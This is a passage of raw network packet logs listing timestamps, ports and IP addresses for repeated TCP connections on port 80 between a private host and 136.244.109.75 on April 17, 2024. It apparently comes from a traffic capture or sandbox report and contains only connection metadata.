Apr 17, 2024 03:17:57.797826052 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797863007 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797904015 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797954082 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:57.797954082 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:57.797954082 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:57.797954082 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:57.797954082 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:57.797954082 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:57.939292908 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:58.001338005 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:58.001408100 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:58.143047094 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:58.143295050 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:58.145128012 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:58.348674059 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:58.348887920 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:58.552617073 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276449919 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276508093 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276546955 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276582003 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276618958 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276638985 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276638985 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276639938 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276639938 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276654959 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276695013 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276731968 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276740074 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276740074 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276740074 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276768923 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276771069 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276814938 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.276823997 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.276856899 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.407474041 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.480691910 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.480809927 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.480848074 CEST	80	49756	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.480961084 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.480961084 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.480961084 CEST	49756	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.615971088 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.616134882 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.618243933 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:59.826245070 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:59.826419115 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.034590960 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829150915 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829216003 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829308987 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829346895 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829386950 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829425097 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829463959 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829473019 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829473972 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829473972 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829473972 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829507113 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829547882 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829576015 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829576015 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829576015 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829591990 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:00.829605103 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.829643011 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:00.970639944 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:01.037677050 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:01.037744045 CEST	80	49757	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:01.037877083 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:01.037877083 CEST	49757	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:01.174742937 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:01.174974918 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:01.176692009 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:01.380892992 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:01.380992889 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:01.584914923 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314438105 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314501047 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314542055 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314580917 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314624071 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314662933 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314683914 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314683914 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314683914 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314702988 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314745903 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314774990 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314774990 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314774990 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314786911 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314806938 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314827919 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.314872026 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.314913988 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.454020977 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.519155979 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.519263029 CEST	80	49758	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.519462109 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.519462109 CEST	49758	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.657411098 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.657531977 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.659961939 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:02.863353968 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:02.863440990 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.067136049 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.793828011 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.793889046 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.793930054 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.793958902 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.793967962 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.794008017 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.794013023 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.794034958 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.794054985 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.794071913 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.794095993 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.794102907 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.794138908 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.794142008 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.794178963 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.794183016 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.794223070 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.794223070 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.794266939 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.948630095 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.997637033 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.997704029 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:03.997704983 CEST	80	49759	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:03.997754097 CEST	49759	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:04.152172089 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:04.152342081 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:04.154071093 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:04.357367039 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:04.357484102 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:04.560899019 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294157982 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294225931 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294266939 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294305086 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294313908 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294348955 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294365883 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294389963 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294390917 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294410944 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294435024 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294445992 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294476032 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294485092 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294516087 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294521093 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294559002 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.294564009 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.294604063 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.456322908 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.497752905 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.497819901 CEST	80	49760	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.497863054 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.498007059 CEST	49760	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.664555073 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.664693117 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.666466951 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:05.874764919 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:05.874942064 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.083024979 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803118944 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803180933 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803220987 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803258896 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803271055 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.803303003 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803323030 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.803345919 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803380013 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.803385973 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803400993 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.803426027 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803431988 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.803466082 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803478956 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.803512096 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:06.803544998 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.803558111 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:06.946284056 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:07.011558056 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:07.011593103 CEST	80	49761	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:07.011626005 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:07.011652946 CEST	49761	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:07.150105953 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:07.150274992 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:07.152096987 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:07.355818033 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:07.356178999 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:07.559726954 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274482965 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274544954 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274588108 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274619102 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274626017 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274665117 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274677992 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274677992 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274704933 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274710894 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274748087 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274751902 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274790049 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274791002 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274827957 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274833918 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274871111 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.274871111 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.274915934 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.419121027 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.478359938 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.478391886 CEST	80	49762	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.478426933 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.478461981 CEST	49762	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.623570919 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.623847961 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.625525951 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:08.829670906 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:08.829883099 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.034037113 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742115021 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742176056 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742213964 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742253065 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742268085 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.742295980 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742336035 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742357016 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.742374897 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742384911 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.742384911 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.742429018 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.742440939 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742480040 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742491007 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.742527008 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.742533922 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.742578030 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.879147053 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.947007895 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.947079897 CEST	80	49764	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:09.947108984 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:09.947181940 CEST	49764	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:10.082869053 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:10.083261967 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:10.084964991 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:10.288356066 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:10.288512945 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:10.491964102 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264024019 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264091969 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264163971 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264202118 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264245033 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264283895 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264322042 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264384985 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264424086 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264456987 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.264456987 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.264456987 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.264456987 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.264467001 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.264493942 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.264517069 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.410172939 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.467917919 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.467983007 CEST	80	49765	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.468118906 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.468118906 CEST	49765	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.613759995 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.613998890 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.616139889 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:11.819722891 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:11.819884062 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.023695946 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.751744986 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.751811028 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.751847982 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.751885891 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.751926899 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.751965046 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.752003908 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.752029896 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.752029896 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.752029896 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.752043009 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.752079964 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.752156019 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.752163887 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.757590055 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.955781937 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.955849886 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.956057072 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.962742090 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.962810993 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.962996960 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.977296114 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.977361917 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.977581024 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:12.991652966 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.991723061 CEST	80	49766	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:12.991924047 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:13.080658913 CEST	49766	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:13.229608059 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:13.437347889 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:13.440213919 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:13.442137957 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:13.649843931 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:13.653587103 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:13.861294985 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.572911024 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573026896 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573067904 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573106050 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573148966 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573187113 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573189020 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.573189020 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.573189020 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.573226929 CEST	80	49767	136.244.109.75	192.168.2.5
Apr 17, 2024 03:18:14.573229074 CEST	49767	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:18:14.573229074 CEST	49767	80	192.168.2.5	136.244.109.75
